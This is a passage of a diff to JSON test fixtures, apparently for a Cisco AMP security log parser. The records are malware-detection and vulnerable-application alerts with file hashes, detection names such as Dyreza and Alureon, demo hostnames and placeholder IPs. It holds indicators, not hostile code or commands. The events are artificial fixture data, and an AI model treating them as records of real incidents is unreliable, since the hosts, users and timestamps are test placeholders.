"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 269306, + "log.offset": 32700, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4773,7 +1159,7 @@ ] }, { - "@timestamp": "2021-01-15T10:11:52.000Z", + "@timestamp": "2021-01-15T10:22:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -4784,42 +1170,39 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667317698527247", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 641000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Executed malware", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667317698527000, + "event.id": 15212386047828, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "event.severity": 3, + "event.start": "2021-01-15T10:22:29.000Z", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "file.path": "file:///C%3A/ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 270625, + "log.offset": 34019, + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" ], "related.hosts": [ "Demo_AMP_Threat_Audit" @@ -4828,9 +1211,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4838,60 +1218,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:50.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257589777530944", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643250", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 224000000, + "cisco.amp.timestamp_nanoseconds": 973000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257589777531000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 274588, + "log.offset": 35375, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4899,60 +1285,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:44.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257564007727167", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643249", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 218000000, + "cisco.amp.timestamp_nanoseconds": 951000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257564007727000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 275907, + "log.offset": 36701, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4960,60 +1350,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:32.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257512468119614", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643248", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 581000000, + "cisco.amp.timestamp_nanoseconds": 576000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257512468120000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 277226, + "log.offset": 38020, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5021,60 +1415,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:20.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257460928512061", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605487", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 569000000, + "cisco.amp.timestamp_nanoseconds": 333000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257460928512000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 278545, + "log.offset": 39339, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5082,64 +1482,58 @@ ] }, { - "@timestamp": "2021-01-15T10:11:18.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617812646789131", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605486", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 875000000, + "cisco.amp.timestamp_nanoseconds": 195000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617812646789000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "bfcc0861c7fb965c1f7473d3dc42cff6", - "file.hash.sha1": "420da91c3199993c9f245b21ea060b69d7ecfd49", - "file.hash.sha256": "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "file.name": "5A.tmp", - "file.path": "\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.os.family": "windows", "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 279864, - "process.hash.md5": "60784f891563fb1b767f70117fc2428f", - "process.hash.sha1": "e6e904b84332191d44de729deb7bfed9bcef2ce9", - "process.hash.sha256": "e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f", - "process.name": "spoolsv.exe", - "process.pid": 1480, + "log.offset": 40665, "related.hash": [ - "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "bfcc0861c7fb965c1f7473d3dc42cff6", - "420da91c3199993c9f245b21ea060b69d7ecfd49" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5155,62 +1549,56 @@ ] }, { - "@timestamp": "2021-01-15T10:11:17.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617808351821830", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605485", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 812000000, + "cisco.amp.timestamp_nanoseconds": 170000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617808351822000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "59.tmp", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 287092, - "process.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "process.name": "tdss.exe", - "process.pid": 3728, + "log.offset": 41991, "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5226,60 +1614,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:09.000Z", + "@timestamp": "2021-01-15T10:20:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257409388904508", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669667045638188", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 56000000, + "cisco.amp.timestamp_nanoseconds": 779000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257413683872000, + "event.id": 6533669667045638000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 294937, + "log.offset": 43310, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5287,50 +1679,62 @@ ] }, { - "@timestamp": "2021-01-15T10:10:59.000Z", + "@timestamp": "2021-01-15T10:20:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "f5:8f:96:c3:53:1c" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.related.cve": [ + "CVE-2015-7204" + ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "f5:8f:96:c3:53:1c" ], - "cisco.amp.timestamp_nanoseconds": 267000000, - "event.action": "Executed malware", + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2015-7204", + "name": "Mozilla Firefox", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", + "version": "41.0" + } + ], + "event.action": "Vulnerable Application Detected", "event.category": [ - "malware" + "file" ], "event.dataset": "cisco.amp", - "event.id": 1489955900267000300, + "event.id": 15210587194928, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:10:59.000Z", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "event.severity": 1, + "event.start": "2021-01-15T10:20:00.000Z", + "file.hash.sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", + "file.name": "firefox.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", + "host.hostname": "Demo_AMP_Exploit_Prevention", + "host.name": "Demo_AMP_Exploit_Prevention", "input.type": "log", - "log.offset": 296255, - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "log.offset": 44629, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5" + "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Exploit_Prevention" ], "related.ip": [ "8.8.8.8", @@ -5343,60 +1747,66 @@ ] }, { - "@timestamp": "2021-01-15T10:10:56.000Z", + "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257357849296955", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669409347600427", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 607000000, + "cisco.amp.timestamp_nanoseconds": 257000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257357849297000, + "event.id": 6533669409347600000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 297536, + "log.offset": 46087, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ 